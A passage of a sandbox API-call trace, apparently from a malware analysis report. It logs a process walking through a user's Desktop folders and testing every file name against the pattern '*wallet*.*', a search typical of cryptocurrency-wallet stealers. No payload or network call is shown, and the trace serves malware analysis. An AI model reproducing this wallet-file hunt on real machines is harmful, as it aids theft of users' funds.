ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.805] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.805] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.805] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.805] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.805] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.805] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.805] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.805] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x49) returned 0x38eaf20 [0110.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x38eaf20, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.805] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf78 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf20 | out: hHeap=0x29a0000) returned 1 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.805] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f00 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.805] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*wallet*.*") returned 0 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.805] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf78 | out: hHeap=0x29a0000) returned 1 [0110.805] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.806] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.806] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.806] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.806] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.806] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.806] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.806] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.806] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x42) returned 0x39700d0 [0110.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.806] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eae18 [0110.806] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.806] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.806] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.806] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*wallet*.*") returned 0 [0110.806] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.806] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eae18 | out: hHeap=0x29a0000) returned 1 [0110.806] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.806] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.806] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.806] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.806] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.806] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.806] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.806] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.806] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a29c0 [0110.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a29c0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.807] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e40 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.807] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*wallet*.*") returned 0 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0110.807] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.807] FindClose (in: hFindFile=0x743260 | out: hFindFile=0x743260) returned 1 [0110.807] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.807] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea6d8 [0110.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x38ea6d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpUsedDefaultChar=0x0) returned 50 [0110.807] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea6d8 | out: hHeap=0x29a0000) returned 1 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.807] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*wallet*.*") returned 0 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970448 | out: hHeap=0x29a0000) returned 1 [0110.807] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.807] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.807] FindClose (in: hFindFile=0x7437a0 | out: hFindFile=0x7437a0) returned 1 [0110.807] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eab58 [0110.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.807] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a3048 [0110.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x29a3048, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpUsedDefaultChar=0x0) returned 36 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a3048 | out: hHeap=0x29a0000) returned 1 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eab58 | out: hHeap=0x29a0000) returned 1 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.808] PathMatchSpecW (pszFile="KTOu", pszSpec="*wallet*.*") returned 0 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.808] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.808] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.808] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.808] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg" [0110.808] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.808] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.808] lstrcatW (in: lpString1="\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="\\LyMn8DqKE.jpg") returned="\\LyMn8DqKE.jpg" [0110.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.808] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c60 | out: hHeap=0x29a0000) returned 1 [0110.809] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*wallet*.*") returned 0 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.809] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.809] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.809] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.809] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif" [0110.809] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.809] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.809] lstrcatW (in: lpString1="\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="\\MB3JQQUgbwGVRNgeCA.gif") returned="\\MB3JQQUgbwGVRNgeCA.gif" [0110.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x38ea218, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", lpUsedDefaultChar=0x0) returned 54 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea218 | out: hHeap=0x29a0000) returned 1 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.809] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*wallet*.*") returned 0 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.809] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.809] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.809] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.809] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.809] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="O93_HCF.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx" [0110.809] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.809] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.809] lstrcatW (in: lpString1="\\", lpString2="O93_HCF.xlsx" | out: lpString1="\\O93_HCF.xlsx") returned="\\O93_HCF.xlsx" [0110.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", lpUsedDefaultChar=0x0) returned 44 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: 